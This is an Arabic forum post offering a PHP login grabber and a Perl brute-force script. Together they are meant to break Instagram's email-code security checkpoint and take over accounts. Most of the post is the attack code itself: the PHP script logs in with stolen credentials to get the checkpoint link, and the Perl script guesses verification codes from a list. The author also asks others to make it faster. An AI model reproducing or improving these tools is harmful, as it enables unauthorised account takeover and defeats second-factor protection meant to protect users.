Untitled

طريقة فك السكيور
@EBBBB
......................................................
80% = التخمين ناجح رغم ان الأغلبية قالو مستحيل عمل تخمين بسبب تغير رابط بعد كم محاولة

20% اللي هو ناقصنا = السرعة السافلة الوقحة الوضيعة بالآداة

20 محاولة يستغرق وقتها 10 دقائق

كلت انشرهه بلكي اكو مبرمجين اقوياء يصلحون الطريقة
والطريقة سهلة


مانطول عليكم ونعطيكم الأدوات بلغة PHP - Perl


أول شيء نرفع هالسكربت [PHP] :-
وظيفته :-
جلب الكوكيز
تسجيل الدخول
جلب رابط السكيور
:-
كود PHP:
<?
$username = $_GET['user'];
$password = $_GET['pass'];
$html = file_get_contents('https://www.instagram.com/accounts/login/?force_classic_login');
$startcode = explode('<input type="hidden" name="csrfmiddlewaretoken" value="' , $html );
$endcode = explode('"/>' , $startcode[1] );
$token = $endcode[0];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.instagram.com/accounts/login/ajax/");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Host: www.instagram.com',
    "X-CSRFToken: $token",
    'X-Instagram-AJAX: 1',
    'X-Requested-With: XMLHttpRequest',
    'Referer: https://www.instagram.com/',
    "Cookie: csrftoken=$token;"
    ));
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=$username&password=$password");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
$check = curl_exec($ch);
$regex = '/\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|$!:,.;]*[A-Z0-9+&@#\/%=~_|$]/i';
preg_match_all($regex, $check, $matches);
$urls = $matches[0];
foreach($urls as $url)
{
    echo $url ;
}
curl_close($ch);
بعد ماترفعه على اي موقع
تشغله بهالطريقة :-
كود:
localhost.sa/grabber.php?user=username&pass=password
مكان username password تحط بدالهم اليوزر والباس للحساب اللي فيه سكيور

وراح يعطيك رابط السكيور

ماعلينا اجتزنا هالمهمة اللي كانت اصعب شيء :-


الحين سكربت البيرل :-
وظيفته :-
التخمين فقط

عيبه :-
السرعة الفاشلة <~ هذا اللي مخليني انزل الموضوع عشان احد يجي ويطور الآداة

السكربت:-
كود:
use LWP::Simple;
use WWW::Mechanize;
use LWP::UserAgent;
system('cls');
system('color 3');
print '
#####################################
Coded By 1337r00t
#####################################
...........................................................................
.%%%%....%%%%%%..%%%%%%..%%%%%%.......%%%%%%\...../%%%\..../%%%\....%%%%%%.
...%%........%%......%%.....(%/.......%%....%)...%:...:%..%:...:%.....%%...
...%%....%%%%%%..%%%%%%....(%/........%%%%)%.}...%:...:%..%:...:%.....%%...
...%%........%%......%%...(%/.........%%...\%)...%:...:%..%:...:%.....%%...
.%%%%%%..%%%%%%..%%%%%%..(%...........%%....\%)...\%%%/....\%%%/......%%...
...........................................................................
';
system('color 1e');
print qq(
Url
ex : http:/www.1337r00t.com/crack.php
=> );
$uri=<STDIN>;
chomp($uri);
print qq(
Username => );
$user=<STDIN>;
chomp($user);
print qq(
Password => );
$pass=<STDIN>;
chomp($pass);
print qq(
Enter Codes File: [Ex:codex.txt]=> );
$list=<STDIN>;
chomp($list);
open (CODEFILE, "<$list") || die "[-] Can't Open The List Of Passwords !";
@LISTS = <CODEFILE>;
close CODEFILE;
foreach $C (@LISTS) {
chomp $C;
$data = get("$uri?user=$user&pass=$pass");
$mech = WWW::Mechanize->new();
$mech->get($data);
$mech->click_button(value => "Verify by Email");
$mech->field(response_code => $C);
$mech->click();
if ($mech->content=~ /<p class="alert-red">/) {
    print "Not Him $C\n";
}
else {
    print "[ Cracked : $C ]";
    exit;
}}
لو كان السرعة 500 محاولة في عشر ثواني

كان أمل كسر السكيور 80%

لكن يبقى العيب الوحيد :-
انه يستغرق على الأقل نص يوم حتى لو كانت السرعة خارقة

لأنه يتغير الكود المرسل اليك كل مايتغير الرابط